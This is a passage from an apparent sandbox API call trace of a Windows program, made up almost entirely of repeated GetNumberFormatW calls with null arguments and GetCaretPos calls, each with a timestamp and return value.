lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.197] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.197] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.197] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.197] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.197] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.197] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.197] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.197] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.197] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.198] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.198] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.198] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.198] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.198] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.198] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.198] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.198] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.198] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.198] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.198] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.198] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.198] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.198] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.198] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.198] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.198] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.198] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.198] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.198] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.198] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.198] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.198] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.198] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.198] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.198] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.198] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.198] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.198] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.198] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.198] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.198] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.198] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.198] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.198] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.198] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.198] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0022.714] lstrlenW (lpString="") returned 0 [0022.714] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.714] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.714] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.714] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.714] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.714] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.714] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.714] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.714] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.714] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.714] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.714] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.714] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.714] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.714] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.714] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.714] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.714] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.714] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.714] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.714] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.714] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.714] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.714] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.714] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.714] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.714] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.714] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.714] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.714] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.714] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.715] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.716] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.717] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0022.718] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 